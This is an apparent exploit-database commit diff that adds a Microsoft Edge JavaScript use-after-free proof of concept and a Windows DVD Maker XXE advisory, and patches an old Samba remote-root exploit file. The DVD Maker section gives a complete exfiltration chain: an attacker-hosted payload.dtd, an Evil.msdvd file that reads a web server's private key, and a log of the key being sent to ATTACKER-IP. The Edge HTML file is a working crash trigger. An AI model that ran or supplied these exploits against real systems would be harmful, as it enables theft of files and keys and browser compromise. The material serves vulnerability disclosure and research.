DB: 2017-03-17

2 new exploits

Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free

Windows DVD Maker 6.1.7 - XML External Entity Injection

files.csv

@@ -5397,6 +5397,7 @@ id,file,description,date,author,platform,type,port
 41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
 41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
 41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
+41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8839,6 +8840,7 @@ id,file,description,date,author,platform,type,port
 41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
 41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,windows,local,0
 41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
+41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139

platforms/unix/remote/22469.c

@@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/7294/info
  
 A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
@@ -5,6 +6,7 @@ A buffer overflow vulnerability has been reported for Samba. The problem occurs
 Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
  
 It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 
+*/
 
 /*  0x333hate => samba 2.2.x remote root exploit
  *
@@ -17,6 +19,7 @@ It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samb
  */
 
 #include <stdio.h>
+#include <stdlib.h>
 #include <unistd.h>
 #include <sys/socket.h>
 #include <sys/types.h>

platforms/windows/dos/41623.html

@@ -0,0 +1,117 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1043
+
+I noticed that some javascript getters behave strangely.
+
+My test code:
+
+var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
+
+var f = document.createElement("iframe");
+
+f.onload = () => {
+    f.onload = null;
+
+    for (var x in window) {
+        if (whitelist.indexOf(x) != -1)
+            continue;
+
+        try {
+            window.__lookupGetter__(x).call(f.contentWindow);
+            log(x);
+        } catch (e) {
+
+        }
+    }
+
+};
+
+f.src = "https://abc.xyz/";
+document.body.appendChild(f);
+
+And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.
+
+Tested on Microsoft Edge 38.14393.0.0.
+-->
+
+<!--
+
+Microsoft Edge: Undefined behavior on some getters
+
+I noticed that some javascript getters behave strangely.
+
+My test code:
+
+var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
+
+var f = document.createElement("iframe");
+
+f.onload = () => {
+    f.onload = null;
+
+    for (var x in window) {
+        if (whitelist.indexOf(x) != -1)
+            continue;
+
+        try {
+            window.__lookupGetter__(x).call(f.contentWindow);
+            log(x);
+        } catch (e) {
+
+        }
+    }
+
+};
+
+f.src = "https://abc.xyz/";
+document.body.appendChild(f);
+
+And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.
+
+Tested on Microsoft Edge 38.14393.0.0.
+
+-->
+
+
+<pre id="d">
+</pre>
+<body></body>
+
+<script>
+
+function log(txt) {
+    var c = document.createElement("div");
+    c.innerText = "log: " + txt;
+    d.appendChild(c);
+}
+
+function main() {
+    var f = document.createElement("iframe");
+    
+    f.onload = () => {
+        f.onload = () => {
+            var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow);
+            var func_cons = status.constructor.constructor;
+
+            var ff = func_cons("return 0x12345;");
+            for (var i = 0; i < 0x100000; i++)
+                ff();
+
+            f.onload = () => {
+                alert("get ready");
+                ff();
+            };
+
+            f.src = "about:blank";
+        };
+
+        //a = f.contentWindow;
+        f.src = "about:blank";
+    };
+
+    document.body.appendChild(f);
+}
+
+main();
+
+</script>

platforms/windows/local/41619.txt

@@ -0,0 +1,157 @@
+[+] Credits: John Page AKA hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+=================
+www.microsoft.com
+
+
+
+Product:
+=================
+Windows DVD Maker 
+v6.1.7
+
+Windows DVD Maker is a feature you can use to make DVDs that you can watch on a computer or on a TV using a regular DVD player. 
+
+
+
+Vulnerability Type:
+=============================
+XML External Entity Injection
+
+
+
+CVE Reference:
+==============
+CVE-2017-0045 
+MS17-020
+
+
+
+Security issue:
+================
+Windows DVD Maker Project ".msdvd" files are prone to XML External Entity attacks allowing remote attackers to gain access
+to files from a victims computer using a specially crafted malicious .msdvd file, resulting in remote information / file disclosures. 
+
+
+POC URL:
+=========
+https://vimeo.com/208383182
+
+
+References:
+============
+https://technet.microsoft.com/library/security/MS17-020
+https://support.microsoft.com/en-us/help/3208223/ms17-020-security-update-for-windows-dvd-maker-march-14-2017
+
+Applies to:
+
+Windows Server 2008 R2 Service Pack 1
+Windows Server 2008 R2 Datacenter
+Windows Server 2008 R2 Enterprise
+Windows Server 2008 R2 Standard
+Windows Web Server 2008 R2
+Windows Server 2008 R2 Foundation
+Windows 7 Service Pack 1
+Windows 7 Ultimate
+Windows 7 Enterprise
+Windows 7 Professional
+Windows 7 Home Premium
+Windows 7 Home Basic
+Windows 7 Starter
+Windows Server 2008 Service Pack 2
+Windows Server 2008 Foundation
+Windows Server 2008 Standard
+Windows Server 2008 for Itanium-Based Systems
+Windows Web Server 2008
+Windows Server 2008 Enterprise
+Windows Server 2008 Datacenter
+Windows Vista Service Pack 2
+Windows Vista Home Basic
+Windows Vista Home Premium
+Windows Vista Business
+Windows Vista Ultimate
+Windows Vista Enterprise
+Windows Vista Starter
+
+
+
+Exploit code(s):
+===============
+Steal XAMPP Web Servers private key "server.key".
+
+1) python -m SimpleHTTPServer 8080 (listens on ATTACKER-IP, hosts payload.dtd)
+
+
+2) "payload.dtd"
+
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
+
+%all;
+
+
+
+3) "Evil.msdvd" 
+
+<?xml version="1.0"?>
+<!DOCTYPE NYHC [ 
+<!ENTITY % file SYSTEM "C:\xampp\apache\conf\ssl.key\server.key">
+<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+
+RESULT:
+XAMPP Web Server private key sent to attacker:
+
+e.g.
+
+C:\>python -m SimpleHTTPServer 8080
+Serving HTTP on 0.0.0.0 port 8080 ...
+
+127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /payload.dtd HTTP/1.1" 200 -
+127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /?-----BEGIN%20RSA%20PRIVATE%20KEY-----MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZpjjFtzhpB5zMPWo3m4dbwelHx8buOt0CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E
+ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmkcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-----END%20RSA%20PRIVATE%20KEY----- HTTP/1.1" 301 -
+127.0.0.1 - - [13/Mar/2017 23:53:37] "GET /?-----BEGIN%20RSA%20PRIVATE%20KEY-----MIICXQIBAAKBgQDBJdMn4+ytDYNqbrdfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5zMPmo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E
+ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh3YQYiKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-----END%20RSA%20PRIVATE%20KEY-----/ HTTP/1.1" 200 -
+
+
+
+
+Disclosure Timeline:
+=========================================
+Vendor Notification: September 3, 2016
+Vendor acknowledgement: November 17, 2016
+March 14, 2017 : Vendor released MS17-020
+March 15, 2017 : Public Disclosure
+
+
+
+Network access:
+=================
+Remote
+
+
+
+Severity:
+===========
+High
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx